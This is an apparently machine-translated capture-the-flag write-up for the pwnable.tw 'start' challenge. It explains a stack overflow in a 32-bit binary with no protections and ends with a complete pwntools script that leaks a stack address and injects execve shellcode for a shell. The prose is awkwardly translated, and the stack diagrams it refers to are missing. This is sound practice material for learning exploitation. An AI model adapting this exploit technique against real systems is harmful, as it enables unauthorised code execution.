pwnable start

If there's something you don't understand , You can comment in the comment area , You will answer when you see it .

After getting the attachment checksec once ：

32 Bit program No protection is turned on , Put in ida Take a look in the middle , There are only two functions _start and _exit, The source code of this topic is not C Code , Itself is assembly code ,：

Let's look at assembly code :

The general process is Press the stack first esp and exit Function address , Then press the string , We can run this program first ：

The middle five times push It should be the pressed strings .

And then write system call Print these strings , then read system call Let the user write data

write 了 0x14 Byte size characters read 0x3c Size characters

During a system call ,esp The value of is constant , We go through gdb Dynamic debugging can also see this .

At the end of the function add esp 14h ; ret; Before executing this sentence , The layout of stack space is like this ：

. 

add esp 0x14 after ,esp Yes exit function , And then ret perform exit, This is the execution flow of the whole function .

The loopholes in this topic are also obvious , It's out there read The procedure executed by the system call ,read 了 0x3c Bytes of data , So we can cover exit The address of the function , Besides NX The protection is not turned on , The stack is executable , So the general use process of this topic is take exit() Function address covers bit ret, Leak the address of the stack , Then write... On the stack shellcode

Overwrite the return address again shellcode That's all. , It should be noted that ,pwntools Generated shellcode yes 44 Bytes of , And what we can write shellcode The size is 0x3C - 0x14 = 40bytes So it is recommended to compile by hand , Or search on relevant websites shellcode.

exp as follows ：

from pwn import *
p = process("./start")
e = ELF("./start")
context.log_level  = 'debug'
#p = remote("chall.pwnable.tw",1000)
context.arch = "i386"
#gdb.debug(e.path,'b _start')
shellcode = asm( "xor ecx,ecx;xor edx,edx ; push edx;push 0x68732f6e;push 0x69622f2f; mov ebx,esp;mov eax,0xb;int 0x80 ")
write_addr = 0x8048087
payload1 = "a" * 0x14  + p32(write_addr) 
p.sendafter(":",payload1)
stack_addr = u32(p.recv(4))
log.success("stack_addr:" + hex(stack_addr))
payload2 = 'a'*0x14 + p32(stack_addr + 0x14)  + shellcode
p.send(payload2)  
p.interactive()

First send payload after , The layout on the stack is as follows ：

The second time payload After sending ： The stack layout is as follows ：

That's about it ！